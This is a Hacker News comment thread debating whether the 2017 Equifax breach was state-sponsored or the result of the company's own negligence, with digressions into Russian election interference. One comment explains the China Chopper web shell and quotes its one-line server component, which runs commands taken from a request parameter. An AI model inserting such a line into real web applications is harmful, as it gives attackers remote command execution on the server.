
The Equifax Hack Has the Hallmarks of State-Sponsored Attack - rayuela
https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros
======
f055
I guess a "State-Sponsored Attack" sounds better than "we got pwned with a bug
that was known since March that we didn't patch and could have been exploited
by a guy in a basement" [[https://qz.com/1073221/the-hackers-who-broke-into-
equifax-ex...](https://qz.com/1073221/the-hackers-who-broke-into-equifax-
exploited-a-nine-year-old-security-flaw/)]

~~~
alva
I hate this grubby finger-pointing to a state actor. Sadly, the majority of
non tech readers will take is as given.

~~~
RhodesianHunter
Considering everything we now know about Russia's attempts to influence our
elections and sew division, is it really unreasonable to think they might try
to throw a wrench into our credit system?

~~~
lowry
Did not they just buy ads on Facebook instead of hacking it?

~~~
_jal
They also attempted hacking (according to the intelligence services) 21
state's election systems, with varying degrees of success.

Pretty sure that qualifies as 'unauthorized access'.

~~~
zaroth
The _Washington Post_ basically exposed this as "Fake News".

[https://www.washingtonpost.com/news/the-
fix/wp/2017/09/23/wh...](https://www.washingtonpost.com/news/the-
fix/wp/2017/09/23/what-we-know-about-the-21-states-targeted-by-russian-
hackers/)

And in case you're interested, here it is from a more _colorful_ source;

[https://theintercept.com/2017/09/28/yet-another-major-
russia...](https://theintercept.com/2017/09/28/yet-another-major-russia-story-
falls-apart-is-skepticism-permissible-yet/)

------
gtrubetskoy
And Equifax linking to a fake phishing site by mistake, was that also "state
sponsored"? Give me a break...

The Equifax hack has the hallmarks of Equifax's complete incompetence when it
comes to security, and that is all.

~~~
24gttghh
My version of Hanlon's Razor:

Be cautious when declaring an event as being born from malice, when the event
is adequately explained by incompetence.

~~~
foxyv
My version is: Never attribute to malice what could be attributed to profit
motive.

~~~
mrguyorama
Profit at the expense of anything else IS malice

------
rdtsc
Ah yes, the super-spy excuse. That worked well before, why not go for it
again.

It basically boils down to "Don't blame us, we are up against the super-
sophisticated Chinese / KGB / aliens etc". It's a way to deflect blame.

> . In a speech at the University of Georgia last month, he [now ex-CEO]
> described a stagnating credit reporting agency with a “culture of tenure”
> and “average talent.”

When the CEO talks publicly about average talent, you can be sure the real
talent is well below average.

~~~
g051051
> > . In a speech at the University of Georgia last month, he [now ex-CEO]
> described a stagnating credit reporting agency with a “culture of tenure”
> and “average talent.”

That was his description of the organization he inherited, in 2005. It was not
his opinion of the organization as it stands now.

~~~
QAPereo
Right, clearly there's been a vast improvement under his tenure! /s

------
tyingq
Perhaps, but I'm not convinced that nation state resources were needed.

A different Equifax site had an admin account with the password..."admin"

[https://www.cnbc.com/2017/09/14/equifax-used-admin-for-
the-l...](https://www.cnbc.com/2017/09/14/equifax-used-admin-for-the-login-
and-password-of-a-non-us-database.html)

~~~
astura
Even if nation state resources weren't _needed_ that doesn't necessarily take
away from the fact that it [may] have the hallmarks of a nation state attack.

I only scanned TFA but it didn't' seem to say "Wow, this was a sophisticated
attack only a country could pull off," but more of "the [scant] evidence so
far seems to point to..."

~~~
g051051
No, it goes into considerable detail about the nature of the attack, how it
changed once it was passed off from an "entry team" to a more advanced group
of hackers, and the level of sophistication.

~~~
astura
Right, but maybe I wasn't clear, by "pulling this hack off," I meant the
_initial_ intrusion, not what happened next.

~~~
g051051
Again, the article mentions that the initial group struggled to get any sort
of foothold after the initial intrusion...it wasn't until the "advanced" team
took over that the _real_ breach began: bypassing firewalls, installing back
doors and web shells, etc.

------
bogomipz
Claiming victimization by a "state-sponsored" actor has now become the "go to"
tool in public relations crisis management of data breaches.

Rather than admit their own complete failure and negligence these companies
are now seeking to portray themselves as victims along with the people they
have permanently put at risk and profited from in the process. It's
disgusting.

If you leave your car unlocked with the keys in the ignition and someone
steals the car, you are not a victim you are an idiot.

~~~
socalnate1
"If you leave your car unlocked with the keys in the ignition and someone
steals the car, you are not a victim you are an idiot."

Well, no. You are both a victim and an idiot. These things are not mutually
exclusive.

------
dspillett
The Equifax Hack Has the Hallmarks of... complete incompetence that may, on
this occasion, have been exploited by a state-sponsored actor.

Who knows what other actors could have exploited it instead or as well?

In any case the incompetence was the root cause and I wouldn't trust Equifax
to speak my weight.

------
eutropia
> Mandiant, the security consulting firm hired by Equifax to investigate the
> breach, said in a report distributed to Equifax clients on Sept. 19 that it
> didn't have enough data to identify either the attackers or their country of
> origin.

Isn't it possible that with the incredible bounty of state-power hacking tools
floating around the web that it's just a criminal organization? Or are we
trying to paint a cold-cyber-war narrative to put Equifax in a sympathetic
light?

------
sschueller
Horseshit. Don't blame your systemic incompetence on a state actor. A five
year old could get in.

~~~
RhodesianHunter
The fact that the hack was simple due to incompetence, and the possibility of
it being state sponsored are not mutually exclusive.

~~~
1001101
True. If that's the case, one could make the argument that they let both our
country, and their customers down.

------
ianhawes
I have to say at first I felt the same way most of the other commenters did:
Claiming this was a state-sponsored attack is a convenient scapegoat.

I'm still skeptical, but I wouldn't dismiss it outright.

I think in the next 6-12 months, if a wholesale PII marketplace doesn't
appear, the odds of a state-sponsored attack go up dramatically. The economics
of wholesale fraud are such that you make money selling to other fraudsters,
not trying to exploit the information yourself (setting up new accounts,
taking over existing accounts, etc..).

For what it's worth, even if this attack was executed by actors unaffiliated
with the government, this information WILL make it's way to intelligence
organization(s) in their home country. Unlike in the US, foreign and domestic
intelligence services maintain a much closer relationship with the hackers in
their home country.

~~~
matt_wulfeck
It’s a good test, though the exploit was so egregious I really doubt it was
one person or group who took advanatage of it.

If the data never sees the light of day in the shadier parts of our internet
then their narrative is more belieavable.

------
kennell
> muh russian hackers

This nonsense is really getting old

~~~
0xfeba
Get used to it. Cyberwarfare is only going to increase.

And there's little doubt Russia interfered with the USA's election. To what
degree is being investigated.

~~~
cuckcuckspruce
Because as we all know, the US is special and gets to fuck with everybody
else's elections (up to and including the violent overthrow of a
democratically elected government and state executed assassination), but do it
to them and suddenly it's a warlike act.

~~~
0xfeba
> Because as we all know, the US is special and gets to fuck with everybody
> else's elections (up to and including the violent overthrow of a
> democratically elected government and state executed assassination), but do
> it to them and suddenly it's a warlike act.

I have no idea of your political inclinations, but generally I find it odd
that the right is overall giving a pass to Russia with this. Deflecting as you
are doing, and not answering the issue at hand.

Russia, formerly via Communism, was all but our enemy shortly after WW2. They
are still an adversary. So, we decided it was in our best interest to fuck
with them, and many other countries because we were "the good guys". Yes, this
got convoluted and contrived, and completely futile -- especially w.r.t.
Vietnam, the Bay of Pigs, Panama, and many others I imagine.

But even considering all that, it still doesn't justify Russia interfering
with our election. Surprising? No.

But why are so many on the right giving Russia a free-pass? It all seems to be
the same motivation that kept us in Vietnam for years after it was known to be
a waste: To avoid admitting you were wrong; to try and save face.

~~~
cuckcuckspruce
I don't think they should get a free pass, so good job on your assumptions
there, kiddo.

I'm more taking issue with people that are shocked, just shocked that other
counties would treat the US the way that the US treats other countries. It's
childish and amusing. The power of American Exceptionalism, what can you do?

~~~
0xfeba
> I don't think they should get a free pass, so good job on your assumptions
> there, kiddo.

The first sentence of my reply explicitly stated that I was not talking about
you, just that you are doing the same thing the right is doing to deflect.
Remember, this was your original low effort post:

>> muh russian hackers >This nonsense is really getting old

So to claim now that:

> I'm more taking issue with people that are shocked, just shocked that other
> counties would treat the US the way that the US treats other countries.

Is what you are taking issue with appears to be disingenuous. You implied all
this Russia hacking stuff was nonsense.

------
feelin_googley
"The business generates a gross margin of about 90%."

Well, I can see why they would have to cut costs associated with employing
customer service representatives to handle requests for copies of credit
reports from consumers.

Faced with such financial pressures, they probably had no choice but to make
private consumer data accessible via public internet and use a "web app" in
order to scale back their costly customer service headcount.

This has all the hallmarks of sound business judgment.

------
nikcub
> Groups known to exploit web shells most effectively include teams with links
> to Chinese intelligence, including one nicknamed Shell Crew.

That's just silly. It is very common when exploiting web apps to utilize a web
shell to persist your access and then to work from that to implement better
and more permanent access.

Web shells are easy to find and they make a lot of noise (POSTs in the web
logs). They are very easy to spot in any org that has their web/app roots
under version control, so advanced adversaries will use them temporarily - not
install 30 of them

> One of the tools used by the hackers—China Chopper—has a Chinese-language
> interface, but is also in use outside China, people familiar with the
> malware said.

China Chopper is an old web shell[0]. It works by having a very thin server
component that simply runs an eval of a POST variable. Most of the
intelligence is in the thick client (read about it at the links below - its
pretty cool but by no means advanced).

While it was developed in China - the interface is in English[1]. There isn't
even much of an interface, as it will reconstruct the server file explorer,
shell, db connection etc.

You can't identify China Chopper from just the server component, since it is a
simple:

    
    
        <% Runtime.getRuntime().exec(request.getParameter("password"))
    

Most decent scanners will have a signature for "exec("[1]

This is what I still don't understand about the Equifax hack. They had an
entire infosec team, ran a SOC, had all sorts of high-end product installed
(including complete traffic logs) yet someone could exfil 10GB+ of data using
a known web app exploit and simple web shell.

There is more to this story, and it will be told in what happen once the
attackers penetrated the first web server and how they were able to pull of
the lateral moves to get to the credit database. I sense there is going to be
some horrible security practice and hygiene on the internal network that
allowed this to happen (think broad permissions, full database access, no db
query monitoring, no encryption internally, etc.).

[0] [https://www.fireeye.com/blog/threat-
research/2013/08/breakin...](https://www.fireeye.com/blog/threat-
research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html)

[1]
[http://informationonsecurity.blogspot.com.au/2012/11/china-c...](http://informationonsecurity.blogspot.com.au/2012/11/china-
chopper-webshell.html)

[2] [https://www.tenable.com/pvs-plugins/9488](https://www.tenable.com/pvs-
plugins/9488)

------
CoolGuySteve
So then it follows that Equifax and similar agencies are structural weak
points in our banking system and dismantling them asap is vital to national
security.

Too big to flail.

------
falcolas
Not that I agree or disagree with the attack being state sponsored, but what
other way to find people potentially ripe for being turned into spies than
those with crushing debt, or other publicly available judgements against them?

Money is a great motivator, especially when you can use one database to find
those in most desperate need of it who are also working for companies ripe for
exploitation.

------
KaiserPro
It was terrible security, implemented poorly.

It doesn't matter if it was as state or not, it should have been so
comprehensive, or easy.

The basic design of where the data was placed, and how easy it was to traverse
the network, combined with a stunning lack of monitoring means that it could
have almost have been a script kiddie who did this.

_almost_

------
Communitivity
"Never attribute to malice that which can be adequately explained by
stupidity, but don't rule out malice." \- 'Hanlon's Razor' (possibly
Heinlein's Razor), by Robert Heinlein and others

------
castratikron
And I suppose the Chief Security Officer at the time, who held a degree in
music an had no relevant experience in technology or security, was a state-
appointed spy, too? Surely the Russians pulled a lot of strings to get her
into that position. There is no other possible explanation.

[http://www.marketwatch.com/story/equifax-ceo-hired-a-
music-m...](http://www.marketwatch.com/story/equifax-ceo-hired-a-music-major-
as-the-companys-chief-security-officer-2017-09-15)

~~~
g051051
> had no relevant experience in technology or security

This has been thoroughly debunked. She had extensive industry experience in a
series of increasingly important security and compliance roles going back at
least 15 years. Furthermore, the Bloomberg article even paints her in a
positive light as someone trying to do the right thing against corporate
opposition.

~~~
castratikron
I didn't know that'd been debunked. They should correct the article if that's
true.

------
idibidiart
Nice national security cover to preempt lawsuits. Can't be sued if Uncle Sam
failed to protect you. Or can you still be sued?

------
CaptSpify
Sure, it's possible it was a state-sponsored attack, but that mostly doesn't
matter. What matters is that this system should have never been set up in the
first place. There's no reason that we need to consolidate this data into one
big target, and then put that target into an easily breachable safe.

------
tresp
I'm surprised how many readers reject the premise outright. I thought the part
'this wasn't a credit card play, this wasn't a get info on every American
play' was somewhat compelling. plus the part about looking into a handful of
people with high security value?

------
banned1
Well, if Hilary can use this excuse...

------
hprotagonist
"remember the credit agency" doesn't have much of a ring to it, though.

------
codazoda
Why is the news spouting this BS? I assume a state-sponsored attack makes for
more readers. Sigh.

~~~
ribfeast
Could be native advertising?

------
jaclaz
TL;DR:

All in all it revolves around:

>... some investigators inside Equifax to suspect a nation-state was behind
the hack. Many of the tools used were Chinese, and these people say the
Equifax breach _has the hallmarks of similar intrusions_ ...

The following sentence:

>Others involved in the investigation aren't so sure, saying the evidence is
inconclusive at best or points in other directions.

is the exact opposite.

And the one following is even worse:

>One person briefed on the probe being conducted by the Federal Bureau of
Investigation and U.S. intelligence agencies said that there is evidence that
a nation-state may have played a role, but that it doesn't point to China. The
person declined to name the country involved because the details are
classified.

So with the investigation still not concluded there is a small number (not
quantified) of people saying it was a Nation-State AND Chinese, another small
group (also not quantified) saying that it was NOT a Nation-State (and thus
NOT Chinese) and ONE single person stating that State-Sponsored intelligence
"may have played a role" BUT NOT Chinese.

All the rest ia about how good are (or were) the people at Equifax and how
hard they tried to make this not happen, but of course you can do nothing if
you are the target of a Nation-State intelligence, particularly if Chinese.

~~~
ianhawes
> Many of the tools used were Chinese

The web shell identified, China Chopper, actually has an English UI (not
Chinese as the article claims). The only relationship to China is that it was
originally compiled by a user that regularly visits the Google HK domain.

------
marank
Hope I don't forget about this case, when I need to argue about maintenance
costs, security upgrades etc, also that's why I like Go so much, you don't
need or supposed to use a full fledged framework, at most a router with no
dependences and lightweight, but best if nothing.

~~~
nv-vn
What does Go have to do with Equifax?

